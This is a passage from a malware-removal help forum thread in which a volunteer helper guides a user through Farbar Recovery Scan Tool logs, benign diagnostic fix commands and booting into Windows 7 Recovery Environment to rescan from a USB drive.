2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-19 19:58 - 2018-01-12 17:33 - 001665384 _____ (Microsoft Corporation) C:\Users\Martin\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe
[2018-01-05 13:05] - [2018-01-01 02:50] - 000455680 _____ (Microsoft Corporation) 11D6A262B617130F7C16E308C12E0D41

C:\Windows\system32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\system32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\system32\services.exe => MD5 is legit
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\system32\rpcss.dll
[2018-01-05 13:05] - [2018-01-01 03:18] - 000512000 _____ (Microsoft Corporation) BA6C9EE518A11DA4AD061B223EBED3D3

C:\Windows\system32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\system32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================



#12 nasdaq

  • Malware Response Team

Posted 22 March 2018 - 07:19 AM


Hi,


Your version of the Farbar tool is not being updated. All logs are dated 14.03.2018
Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
===

The bad Zero File on your last log has changed again.

===

To continue and proceed, you will need access to a spare PC and a USB flash drive that has not been in contact with the sick PC... Please confirm that you have this option.

To see if you can run the following to enable Recovery Environment...

Please confirm that you have this option.
<<<

Now, open FRST on the compromised computer:

Copy/paste the following inside the text area of FRST. Once done, click on the Fix button. A file called fixlog.txt should appear on your desktop. Attach it in your next reply.

Start::
CMD: bcdedit.exe /set {bootmgr} displaybootmenu yes
CMD: bcdedit.exe /set {default} recoveryenabled yes
CMD: fltmc instances
CMD: dir /a:-d /o:d C:\windows\system32\drivers
End::


Post the fixlog.txt and wait for further instructions.
<<<>>>

#13 mortn

  • Topic Starter

  • Members

Posted 22 March 2018 - 12:14 PM

Hello!

Yeah, FRST does not update. No programs do. I'm guessing it's because a lot of services are disabled, if I look in msconfig. Since I haven't had internet connection this entire time, I've done it all with the help of another computer.

 

If you don't mind me asking, how are we doing so far? Has any progress been made? It's hard for me to tell, since I'm very unknowledgeable when it comes to malware.

 

Here's the fixlog from FRST:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (22-03-2018 18:12:49) Run:4
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CMD: bcdedit.exe /set {bootmgr} displaybootmenu yes
CMD: bcdedit.exe /set {default} recoveryenabled yes
CMD: fltmc instances
CMD: dir /a:-d /o:d C:\windows\system32\drivers

*****************


========= bcdedit.exe /set {bootmgr} displaybootmenu yes =========

The operation completed successfully.

========= End of CMD: =========


========= bcdedit.exe /set {default} recoveryenabled yes =========

The operation completed successfully.

========= End of CMD: =========


========= fltmc instances =========

Filter                Volume Name                              Altitude        Instance Name      Frame  VlStatus
--------------------  -------------------------------------  ------------  ---------------------  -----  --------
MpFilter              \Device\Mup                             328000       MpFilter Instance        0    
MpFilter              C:                                      328000       MpFilter Instance        0    
MpFilter              D:                                      328000       MpFilter Instance        0    
MpFilter                                                      328000       MpFilter Instance        0    
MpFilter              H:                                      328000       MpFilter Instance        0    
luafv                 C:                                      135000       luafv                    0    
FileInfo              \Device\Mup                              45000       FileInfo                 0    
FileInfo              C:                                       45000       FileInfo                 0    
FileInfo              D:                                       45000       FileInfo                 0    
FileInfo                                                       45000       FileInfo                 0    
FileInfo              H:                                       45000       FileInfo                 0    

========= End of CMD: =========


========= dir /a:-d /o:d C:\windows\system32\drivers =========

 Volume in drive C is Structure
 Volume Serial Number is 181D-E218

 Directory of C:\windows\system32\drivers

2007-02-16  01:57            40ÿ648 ElbyCDFL.sys
2009-02-17  18:11            31ÿ400 ElbyCDIO.sys
2009-03-18  17:35            33ÿ856 hamachi.sys
2009-06-10  21:30         3ÿ440ÿ660 gm.dls
2009-06-10  21:30               646 gmreadme.txt
2009-06-10  21:31            31ÿ232 hcw85cir.sys
2009-06-10  21:34           270ÿ848 b57nd60a.sys
2009-06-10  21:34           468ÿ480 bxvbda.sys
2009-06-10  21:34         3ÿ286ÿ016 evbda.sys
2009-06-10  21:37            23ÿ040 secdrv.sys
2009-06-10  21:41            18ÿ432 BrFiltLo.sys
2009-06-10  21:41             8ÿ704 BrFiltUp.sys
2009-06-10  21:41            47ÿ104 BrSerWdm.sys
2009-06-10  21:41            14ÿ976 BrUsbMdm.sys
2009-06-10  21:41            14ÿ720 BrUsbSer.sys
2009-06-10  21:48           426ÿ496 spsys.sys
2009-07-14  00:19            60ÿ416 processr.sys
2009-07-14  00:19            60ÿ928 amdppm.sys
2009-07-14  00:19            64ÿ512 amdk8.sys
2009-07-14  00:19            62ÿ464 intelppm.sys
2009-07-14  00:19             6ÿ144 null.sys
2009-07-14  00:19            92ÿ160 cdfs.sys
2009-07-14  00:19            26ÿ112 msfs.sys
2009-07-14  00:19            44ÿ032 npfs.sys
2009-07-14  00:19           105ÿ472 i8042prt.sys
2009-07-14  00:25            34ÿ304 filetrace.sys
2009-07-14  00:31            14ÿ336 wmiacpi.sys
2009-07-14  00:31            17ÿ664 CmBatt.sys
2009-07-14  00:31             9ÿ728 errdev.sys
2009-07-14  00:31            26ÿ624 hidbatt.sys
2009-07-14  00:35            45ÿ056 blbdrive.sys
2009-07-14  00:37            40ÿ448 discache.sys
2009-07-14  00:37            42ÿ496 watchdog.sys
2009-07-14  00:38            16ÿ896 dxapi.sys
2009-07-14  00:38            98ÿ816 dxg.sys
2009-07-14  00:38            29ÿ184 vga.sys
2009-07-14  00:38            29ÿ184 vgapnp.sys
2009-07-14  00:38           129ÿ024 videoprt.sys
2009-07-14  00:38            30ÿ208 monitor.sys
2009-07-14  01:00             6ÿ656 beep.sys
2009-07-14  01:00             6ÿ784 mspqm.sys
2009-07-14  01:00             7ÿ168 mspclock.sys
2009-07-14  01:00             8ÿ064 mstee.sys
2009-07-14  01:00            11ÿ136 mskssrv.sys
2009-07-14  01:00            20ÿ992 ksthunk.sys
2009-07-14  01:00            26ÿ624 sermouse.sys
2009-07-14  01:00            31ÿ232 mouhid.sys
2009-07-14  01:00            23ÿ552 serenum.sys
2009-07-14  01:00            20ÿ992 smclib.sys
2009-07-14  01:00            94ÿ208 serial.sys
2009-07-14  01:00            97ÿ280 parport.sys
2009-07-14  01:00            24ÿ576 flpydisk.sys
2009-07-14  01:00            29ÿ696 fdc.sys
2009-07-14  01:01            14ÿ336 sffdisk.sys
2009-07-14  01:01            16ÿ896 sfloppy.sys
2009-07-14  01:01            13ÿ824 sffp_mmc.sys
2009-07-14  01:01            29ÿ184 tape.sys
2009-07-14  01:01            22ÿ016 mcd.sys
2009-07-14  01:02            27ÿ776 wacompen.sys
2009-07-14  01:02            15ÿ360 MTConfig.sys
2009-07-14  01:06            68ÿ864 stream.sys
2009-07-14  01:06            46ÿ592 hidir.sys
2009-07-14  01:06             8ÿ192 mshidkmdf.sys
2009-07-14  01:06            45ÿ568 circlass.sys
2009-07-14  01:06            68ÿ096 1394bus.sys
2009-07-14  01:06            72ÿ832 ohci1394.sys
2009-07-14  01:06           100ÿ864 hidbth.sys
2009-07-14  01:06            72ÿ192 bthmodem.sys
2009-07-14  01:06             9ÿ728 umpass.sys
2009-07-14  01:07            24ÿ576 vwifibus.sys
2009-07-14  01:07            59ÿ904 vwififlt.sys
2009-07-14  01:07            17ÿ920 vwifimp.sys
2009-07-14  01:08            35ÿ328 ndiscap.sys
2009-07-14  01:08            60ÿ928 lltdio.sys
2009-07-14  01:08            76ÿ800 rspndr.sys
2009-07-14  01:08            17ÿ920 irenum.sys
2009-07-14  01:09           120ÿ320 irda.sys
2009-07-14  01:09            93ÿ184 smb.sys
2009-07-14  01:09            12ÿ800 wfplwf.sys
2009-07-14  01:09            46ÿ592 qwavedrv.sys
2009-07-14  01:09            41ÿ472 RNDISMP.sys
2009-07-14  01:10           116ÿ224 ipnat.sys
2009-07-14  01:10            14ÿ848 rasacd.sys
2009-07-14  01:10            23ÿ040 asyncmac.sys
2009-07-14  01:10            92ÿ672 raspppoe.sys
2009-07-14  01:10            60ÿ416 agilevpn.sys
2009-07-14  01:10            83ÿ968 rassstp.sys
2009-07-14  01:10            21ÿ504 ws2ifsl.sys
2009-07-14  01:10            11ÿ264 rootmdm.sys
2009-07-14  01:10            40ÿ448 modem.sys
2009-07-14  01:16            15ÿ872 tdpipe.sys
2009-07-14  01:16             7ÿ680 RDPENCDD.sys
2009-07-14  01:16             7ÿ680 RDPCDD.sys
2009-07-14  01:16             8ÿ192 RDPREFMP.sys
2009-07-14  01:17            24ÿ064 rdpbus.sys
2009-07-14  01:35            12ÿ288 serscan.sys
2009-07-14  01:38            25ÿ088 usbprint.sys
2009-07-14  02:01            95ÿ232 bridge.sys
2009-07-14  02:19           286ÿ720 BrSerId.sys
2009-07-14  02:43            55ÿ128 dumpfve.sys
2009-07-14  02:45           128ÿ592 ql40xx.sys
2009-07-14  02:45            43ÿ584 sisraid2.sys
2009-07-14  02:45            12ÿ352 pciide.sys
2009-07-14  02:45           220ÿ752 pcmcia.sys
2009-07-14  02:45            50ÿ768 pcw.sys
2009-07-14  02:45            80ÿ464 sisraid4.sys
2009-07-14  02:45         1ÿ524ÿ816 ql2300.sys
2009-07-14  02:45            48ÿ720 pciidex.sys
2009-07-14  02:45            19ÿ008 spldr.sys
2009-07-14  02:45            12ÿ496 swenum.sys
2009-07-14  02:45            64ÿ080 UAGP35.SYS
2009-07-14  02:45            24ÿ656 stexstor.sys
2009-07-14  02:45            64ÿ592 ULIAGPKX.SYS
2009-07-14  02:45            21ÿ056 wd.sys
2009-07-14  02:45            17ÿ488 viaide.sys
2009-07-14  02:45            36ÿ432 vdrvroot.sys
2009-07-14  02:45           161ÿ872 vsmraid.sys
2009-07-14  02:45            16ÿ464 wmilib.sys
2009-07-14  02:45            22ÿ096 wimmount.sys
2009-07-14  02:47            65ÿ088 GAGP30KX.SYS
2009-07-14  02:47            24ÿ144 crcdisk.sys
2009-07-14  02:47            28ÿ736 Dumpata.sys
2009-07-14  02:47            39ÿ504 crashdmp.sys
2009-07-14  02:47            73ÿ280 disk.sys
2009-07-14  02:47           530ÿ496 elxstor.sys
2009-07-14  02:47            70ÿ224 fileinfo.sys
2009-07-14  02:47            55ÿ376 fsdepends.sys
2009-07-14  02:48            50ÿ768 kbdclass.sys
2009-07-14  02:48            16ÿ960 intelide.sys
2009-07-14  02:48            44ÿ112 iirsp.sys
2009-07-14  02:48           106ÿ560 lsi_sas.sys
2009-07-14  02:48            65ÿ600 lsi_sas2.sys
2009-07-14  02:48           115ÿ776 lsi_scsi.sys
2009-07-14  02:48           114ÿ752 lsi_fc.sys
2009-07-14  02:48            35ÿ392 megasas.sys
2009-07-14  02:48           284ÿ736 MegaSR.sys
2009-07-14  02:48            20ÿ544 isapnp.sys
2009-07-14  02:48           122ÿ960 NV_AGP.SYS
2009-07-14  02:48            51ÿ264 nfrd960.sys
2009-07-14  02:48            15ÿ424 msisadrv.sys
2009-07-14  02:48            49ÿ216 mouclass.sys
2009-07-14  02:48            32ÿ320 mssmbios.sys
2009-07-14  02:48            60ÿ496 mup.sys
2009-07-14  02:52           194ÿ128 amdsbs.sys
2009-07-14  02:52            15ÿ440 aliide.sys
2009-07-14  02:52            87ÿ632 arc.sys
2009-07-14  02:52            24ÿ128 atapi.sys
2009-07-14  02:52            97ÿ856 arcsas.sys

========= End of CMD: =========


==== End of Fixlog 18:12:49 ====


Edited by mortn, 22 March 2018 - 12:15 PM.


#14 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 23 March 2018 - 08:01 AM

Hi,

This infection may be stopping many services.

The first thing we must do is remove it.

Read or print these instructions. It may help you. Follow them carefully.

Let's proceed:

Preparing the USB Flash Drive

Using the clean computer, download the right version of the Farbar program for your system to the Desktop.
64-bit or 32-bit version. Select the one you need.
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/

Move the executable (FRST.exe or FRST64.exe) to your USB Flash Drive
 

How to determine whether a computer is running a 32-bit version or 64-bit version of the Windows operating system.
https://support.microsoft.com/en-us/help/827218/how-to-determine-whether-a-computer-is-running-a-32-bit-version-or-64

===

Boot in the Recovery Environment WINDOWS 7 USERS.

To enter the Recovery Environment with Windows Vista and Windows 7, follow the instructions below:
Restart the computer
Once you've seen your BIOS splashscreen (the computer manufacturer logo), tap the F8 key repeatedly until the Advanced Boot Options menu appears

Look at this video if not familiar with it.
http://www.informit.com/articles/article.aspx?p=1400870

Use the arrow keys to select Repair your computer, and press on Enter
Select your keyboard layout (US, French, etc.) and click on Next

Once in the command prompt
Plug your USB Flash Drive in the infected computer
---

Click on Command Prompt to open the command prompt

In the command prompt, type notepad and press on Enter
Notepad will open. Click on the File menu and select Open
Click on Computer/This PC, find the letter for your USB Flash Drive, then close the window and Notepad

In the command prompt, type e:\frst.exe (for the x64 version, type e:\frst64.exe) and press on Enter

Note: Replace the letter e with the drive letter of your USB Flash Drive

FRST will open

Click on Yes to accept the disclaimer
Click on the Scan button and wait for the scan to complete
A log called fixlog.txt will be saved on your USB Flash Drive. Attach it in your next reply.

Wait for further instructions.

p.s.
If at any time you need additional information please ask before proceeding.

#15 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts

Posted 26 March 2018 - 02:54 AM

Hello and thanks for the info. I will do the requested tasks as soon as I can. Unfortunately I am away on a business trip and will return home in a few days. Sorry about the delay.



